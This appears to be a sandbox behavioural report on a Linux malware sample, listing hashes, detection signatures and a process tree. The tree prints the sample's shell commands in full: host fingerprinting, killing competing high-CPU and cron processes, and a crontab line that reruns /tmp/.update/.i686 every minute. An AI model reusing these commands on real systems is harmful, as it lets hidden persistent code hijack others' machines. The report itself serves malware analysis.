Overview
overview
10Static
static
5.systemd/.i686
ubuntu-22.04-amd64
3.systemd/.run
ubuntu-18.04-amd64
7.systemd/.run
debian-9-armhf
6.systemd/.run
debian-9-mips
6.systemd/.run
debian-9-mipsel
6.systemd/.x86_64
ubuntu-24.04-amd64
10.systemd/auto
ubuntu-18.04-amd64
7.systemd/auto
debian-9-armhf
7.systemd/auto
debian-9-mips
7.systemd/auto
debian-9-mipsel
7.systemd/clean
ubuntu-18.04-amd64
1.systemd/clean
debian-9-armhf
1.systemd/clean
debian-9-mips
1.systemd/clean
debian-9-mipsel
1.systemd/go
ubuntu-18.04-amd64
1.systemd/go
debian-9-armhf
1.systemd/go
debian-9-mips
1.systemd/go
debian-9-mipsel
1.systemd/ntpdate
ubuntu-18.04-amd64
7.systemd/ntpdate
debian-9-armhf
7.systemd/ntpdate
debian-9-mips
7.systemd/ntpdate
debian-9-mipsel
7.update/.i686
ubuntu-20.04-amd64
6.update/.run
ubuntu-18.04-amd64
3.update/.run
debian-9-armhf
3.update/.run
debian-9-mips
3.update/.run
debian-9-mipsel
3.update/.x86_64
ubuntu-22.04-amd64
10.update/auth
ubuntu-18.04-amd64
8.update/auth
debian-9-armhf
8.update/auth
debian-9-mips
8.update/auth
debian-9-mipsel
8Analysis
-
max time kernel
149s -
max time network
134s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
08-11-2024 11:36
Behavioral task
behavioral1
Sample
.systemd/.i686
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral2
Sample
.systemd/.run
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral3
Sample
.systemd/.run
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
.systemd/.run
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral5
Sample
.systemd/.run
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
.systemd/.x86_64
Resource
ubuntu2404-amd64-20240523-en
Behavioral task
behavioral7
Sample
.systemd/auto
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral8
Sample
.systemd/auto
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral9
Sample
.systemd/auto
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral10
Sample
.systemd/auto
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral11
Sample
.systemd/clean
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral12
Sample
.systemd/clean
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral13
Sample
.systemd/clean
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral14
Sample
.systemd/clean
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral15
Sample
.systemd/go
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral16
Sample
.systemd/go
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral17
Sample
.systemd/go
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral18
Sample
.systemd/go
Resource
debian9-mipsel-20240418-en
Behavioral task
behavioral19
Sample
.systemd/ntpdate
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
.systemd/ntpdate
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral21
Sample
.systemd/ntpdate
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral22
Sample
.systemd/ntpdate
Resource
debian9-mipsel-20240418-en
Behavioral task
behavioral23
Sample
.update/.i686
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral24
Sample
.update/.run
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral25
Sample
.update/.run
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral26
Sample
.update/.run
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral27
Sample
.update/.run
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral28
Sample
.update/.x86_64
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral29
Sample
.update/auth
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral30
Sample
.update/auth
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral31
Sample
.update/auth
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral32
Sample
.update/auth
Resource
debian9-mipsel-20240729-en
General
-
Target
.update/.i686
-
Size
1.4MB
-
MD5
0418fda2bb712a2a2dfe38bbbd9e6390
-
SHA1
3a7db599e916e40ae844e4998b665bad5307154d
-
SHA256
05bfc9c56ad09d2b15a43f7887087d4f601016c0d81a822f42fc23ca70fbbf33
-
SHA512
d40c63ec0d5e60db266c9223a02d5b2d97787cca481c9f56beddcd3ffe3022badd8ff6e4fa25a73d56be06f99cc6555031af185f88017a74bcd050ac5be33401
-
SSDEEP
24576:bZ9yQjOF5thg8/LRLgP+kMzdroSXcRb+34YlCB0V4XLNw3QgRHpV8RDHkSrWgfqH:lNC5tOcRL4M4Rbo4YibwggRM1rCjPF
Malware Config
Signatures
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/product_name .i686 File opened for reading /sys/devices/virtual/dmi/id/board_vendor .i686 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor .i686 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor .i686 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.6m5OSD crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_name .i686 File opened for reading /sys/devices/virtual/dmi/id/board_version .i686 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag .i686 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag .i686 File opened for reading /sys/devices/virtual/dmi/id/product_serial .i686 File opened for reading /sys/devices/virtual/dmi/id/product_uuid .i686 File opened for reading /sys/devices/virtual/dmi/id/chassis_type .i686 File opened for reading /sys/devices/virtual/dmi/id/chassis_version .i686 File opened for reading /sys/devices/virtual/dmi/id/bios_date .i686 File opened for reading /sys/devices/virtual/dmi/id/product_version .i686 File opened for reading /sys/devices/virtual/dmi/id/board_serial .i686 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor .i686 File opened for reading /sys/devices/virtual/dmi/id/bios_version .i686 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial .i686 -
Security Software Discovery 1 TTPs 2 IoCs
Adversaries may attempt to discover installed security software and its configurations.
pid Process 1440 sh 1463 sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo .i686 -
Reads CPU attributes 1 TTPs 7 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online .i686 File opened for reading /sys/devices/system/cpu/types .i686 File opened for reading /sys/devices/system/cpu/possible .i686 File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 60 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets .i686 File opened for reading /sys/bus/dax/devices/target_node .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map .i686 File opened for reading /sys/bus/node/devices/node0/meminfo .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map .i686 File opened for reading /sys/devices/system/node/online .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map .i686 File opened for reading /sys/firmware/dmi/tables/DMI .i686 File opened for reading /sys/bus/node/devices/node0/access0/initiators .i686 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map .i686 File opened for reading /sys/kernel/mm/hugepages .i686 File opened for reading /sys/bus/node/devices/node0/cpumap .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map .i686 File opened for reading /sys/bus/dax/target_node .i686 File opened for reading /sys/bus/cpu/devices .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets .i686 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point .i686 File opened for reading /sys/fs/cgroup/unified/cgroup.controllers .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets .i686 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition .i686 File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems .i686 File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition .i686 File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus .i686 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level .i686 File opened for reading /sys/bus/node/devices/node0/hugepages .i686 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map .i686 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages .i686 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages .i686 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus .i686 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id .i686 File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq .i686 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map .i686 File opened for reading /sys/bus/dax/devices .i686 File opened for reading /sys/bus/node/devices/node0/access1/initiators .i686 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth .i686 File opened for reading /sys/devices/virtual/dmi/id .i686 -
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
pid Process 1466 ps 1442 ps -
description ioc Process File opened for reading /proc/565/stat ps File opened for reading /proc/787/cmdline ps File opened for reading /proc/15/status ps File opened for reading /proc/455/stat ps File opened for reading /proc/85/status ps File opened for reading /proc/89/stat ps File opened for reading /proc/495/stat ps File opened for reading /proc/444/stat ps File opened for reading /proc/962/status ps File opened for reading /proc/1342/status ps File opened for reading /proc/87/status ps File opened for reading /proc/175/stat ps File opened for reading /proc/3/stat ps File opened for reading /proc/1349/status ps File opened for reading /proc/443/cmdline ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/558/stat ps File opened for reading /proc/1349/cmdline ps File opened for reading /proc/3/stat ps File opened for reading /proc/1328/cmdline ps File opened for reading /proc/79/status ps File opened for reading /proc/169/status ps File opened for reading /proc/1068/status ps File opened for reading /proc/87/status ps File opened for reading /proc/23/stat ps File opened for reading /proc/91/cmdline ps File opened for reading /proc/1068/stat ps File opened for reading /proc/1333/stat ps File opened for reading /proc/164/status ps File opened for reading /proc/457/status ps File opened for reading /proc/1039/status ps File opened for reading /proc/1397/stat ps File opened for reading /proc/7/status ps File opened for reading /proc/1398/stat ps File opened for reading /proc/868/stat ps File opened for reading /proc/500/status ps File opened for reading /proc/558/stat ps File opened for reading /proc/1138/status ps File opened for reading /proc/169/stat ps File opened for reading /proc/693/status ps File opened for reading /proc/876/status ps File opened for reading /proc/91/stat ps File opened for reading /proc/1097/stat ps File opened for reading /proc/90/cmdline ps File opened for reading /proc/813/stat ps File opened for reading /proc/159/cmdline ps File opened for reading /proc/1465/cmdline ps File opened for reading /proc/159/stat ps File opened for reading /proc/444/stat ps File opened for reading /proc/962/cmdline ps File opened for reading /proc/159/stat ps File opened for reading /proc/676/status ps File opened for reading /proc/20/stat ps File opened for reading /proc/86/status ps File opened for reading /proc/681/status ps File opened for reading /proc/171/stat ps File opened for reading /proc/272/status ps File opened for reading /proc/77/cmdline ps File opened for reading /proc/693/cmdline ps File opened for reading /proc/1162/status ps File opened for reading /proc/22/stat ps File opened for reading /proc/1366/status ps File opened for reading /proc/1097/cmdline ps File opened for reading /proc/1336/cmdline ps -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.update/.cron sh File opened for modification /tmp/.lock .i686
Processes
-
/tmp/.update/.i686/tmp/.update/.i6861⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1398 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:1399
-
/usr/bin/hostnamehostname -I3⤵PID:1402
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:1404
-
-
/usr/bin/awkawk "{print \"-\"\$2}"3⤵PID:1409
-
-
/usr/bin/headhead -n 13⤵PID:1408
-
-
/usr/bin/grepgrep "Port "3⤵PID:1407
-
-
/usr/bin/catcat /etc/ssh/sshd_config3⤵PID:1406
-
-
/usr/bin/whoamiwhoami3⤵PID:1410
-
-
/usr/bin/hostnamehostname3⤵PID:1411
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:1412
-
-
/usr/bin/sedsed -e "s/\$//"3⤵PID:1418
-
-
/usr/bin/sedsed -e "s/^ *//"3⤵PID:1417
-
-
/usr/bin/cutcut -d: -f23⤵PID:1416
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:1415
-
-
/usr/bin/awkawk "{print \$1}"3⤵PID:1421
-
-
/usr/bin/awkawk "{print \$4}"3⤵PID:1424
-
-
/usr/bin/awkawk "{print \$4}"3⤵PID:1427
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:1428
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:1430
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1429
-
-
/usr/bin/idid -u3⤵PID:1432
-
-
/usr/bin/grepgrep -v grep3⤵PID:1438
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:1437
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1436
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
- Security Software Discovery
PID:1440 -
/usr/bin/idid -u3⤵PID:1441
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:1446
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:1445
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:1444
-
-
/usr/bin/grepgrep -v grep3⤵PID:1443
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1442
-
-
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
- Writes file to tmp directory
PID:1448 -
/usr/bin/rmrm -rf /tmp/.update/.cron3⤵PID:1450
-
-
/usr/bin/grepgrep -v grep3⤵PID:1452
-
-
/usr/bin/crontabcrontab -l3⤵PID:1451
-
-
/usr/bin/grepgrep -v /tmp/.update/.i6863⤵PID:1453
-
-
/usr/bin/grepgrep "/tmp/.update/.i686\$"3⤵PID:1457
-
-
/usr/bin/grepgrep -v grep3⤵PID:1456
-
-
/usr/bin/uniquniq3⤵PID:1459
-
-
/usr/bin/crontabcrontab -l3⤵PID:1455
-
-
/usr/bin/wcwc -l3⤵PID:1460
-
-
/usr/bin/sortsort3⤵PID:1458
-
-
/usr/bin/crontabcrontab /tmp/.update/.cron3⤵
- Creates/modifies Cron job
PID:1461
-
-
/usr/bin/rmrm -rf /tmp/.update/.cron3⤵PID:1462
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
- Security Software Discovery
PID:1463 -
/usr/bin/idid -u3⤵PID:1464
-
-
/usr/bin/wcwc -l3⤵PID:1470
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:1469
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"3⤵PID:1468
-
-
/usr/bin/grepgrep -v grep3⤵PID:1467
-
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1466
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42B
MD59814e9c19a7304358742e3553bd73ea7
SHA188d43c112af907d972b1f1e2f49632f8ca004864
SHA2569941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d
SHA512eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f
-
Filesize
234B
MD5964b07829b4f71b67d83a0ac24db1cab
SHA1bf052205fa7870a5b2ebb4141a4bb604ccecf435
SHA256af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b
SHA512d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b